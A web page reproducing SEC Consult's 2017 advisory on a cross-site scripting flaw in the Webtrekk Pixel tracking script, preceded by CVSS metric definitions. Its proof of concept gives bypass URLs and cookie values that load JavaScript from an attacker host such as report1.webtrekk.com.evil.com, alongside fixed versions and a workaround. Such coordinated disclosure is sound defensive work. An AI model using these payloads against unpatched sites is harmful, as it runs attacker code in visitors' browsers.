The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
Low
I
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: Webtrekk Pixel Tracking Cross Site Scripting
SEC Consult Vulnerability Lab Security Advisory < 20171017-0 >
=======================================================================
title: Cross site scripting
product: Webtrekk Pixel tracking
vulnerable version: v3.24 to v3.40, v4.00 to v4.40, v5.00 to v5.04
fixed version: v3.41, v4.41, v5.05
impact: Medium
homepage: https://www.webtrekk.com/
found: 2017-08-29
by: Malte Batram for
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Webtrekk Analytics offers an endless range of filter and analysis functions.
Whatever type of site you operate, our analytics tools give you the raw data
you need to dive into your web and app metrics so you can optimise your
digital marketing campaigns."
Source: https://www.webtrekk.com/en/solutions/analytics/
"At home in Germany, Webtrekk ranks first among professional analytics tools
used by the 1,000 most popular .de domains. All told, Webtrekk has a
22.9 percent market share among providers for the top German domains,
excluding sites that use Google Analytics or have no analytics system."
Source: https://www.webtrekk.com/en/why-webtrekk/market-leader/
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
-----------------------------------
1) Cross site scripting vulnerability
The Webtrekk Pixel component, used on many websites to track users, has the
capability to load arbitrary external JavaScript via multiple parameter
combinations. The parameters are parsed from the search-part of the URL.
?wt_overlay=1&wt_reporter=url_for_external_javascript
?wt_heatmap=1&wt_reporter=url_for_external_javascript
The URL specified in the parameter wt_reporter is checked by a Regex that can
be bypassed in different ways.
Proof of concept:
-----------------
1) Cross site scripting vulnerability
Example URL:
http://www.example.com/?wt_overlay=1&wt_reporter=report1.webtrekk.com.evil.com/
The example URL leads to the inclusion of the following HTML in the page:
<script language="javascript" type="text/javascript"
src="https://report1.webtrekk.com.evil.com/overlay.pl?
wt_contentId=..."></script>
Regex that checks the URL:
/^(http[s]?:\/\/)?(report\d+|analytics)\.webtrekk\.(com|de).*$/
The .* at the end of the expression allows multiple bypasses:
Subdomain: report1.webtrekk.com.evil.com/
Auth: [email protected]/
NoSlash: report1.webtrekk.com
The last bypass leads to the inclusion of JavaScript from the domain
overlay.pl, which at the time of testing was open to be registered, but has been
registered by Webtrekk for security reasons now.
The vulnerability can also be triggered via cookies. This enables an attacker
to execute JavaScript in the session of the victim anytime the website with
the vulnerable script is visited, after only using the parameters from the
search once to set the cookie values.
Cookie values:
wt_overlay=1; wt_overlayFrame=report1.webtrekk.com.evil.com/;
Vulnerable / tested versions:
-----------------------------
Latest version v4.3.9 tested:
https://support.webtrekk.com/hc/de/article_attachments/115005882469/Webtrekk_EN_Config_Pixel_v4.3.9.zip
Also found to be vulnerable: 3.2.6, 4.0.5, 4.3.5
The setup for version 5 is different and the static part (tiLoader.min.js)
does not include the vulnerable JavaScript directly. However code similiar to
the overlay functions from version 3 and 4 seems to be loaded dynamically (which
also includes the same Regex check).
According to the vendor, v5 is affected as well.
Vendor contact timeline:
------------------------
2017-08-30: Contacting vendor through [email protected] & email under "Contact",
no answer
2017-09-12: Asking for contact again
2017-09-12: Vendor: requests sending the advisory and verifies it internally
2017-09-13: Vendor: optimized validation, fixed in internal version
2017-09-14: Release of patched version and vendor informs their customers
2017-10-17: Coordinated release of security advisory
Solution:
---------
Upgrade to the patched versions from the vendor immediately. The following
versions contain better domain validation and fix the issue according to
the vendor:
v3.41, v4.41, v5.05
According to the vendor, the updated versions are available within the
support center on the vendor's website for all customers and a message that
a security update is available will be shown.
Workaround:
-----------
Setting "disableOverlayView: true" in the webtrekkConfig prevents the execution
of the vulnerable code.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/about-us/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF M. Batram / @2017
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum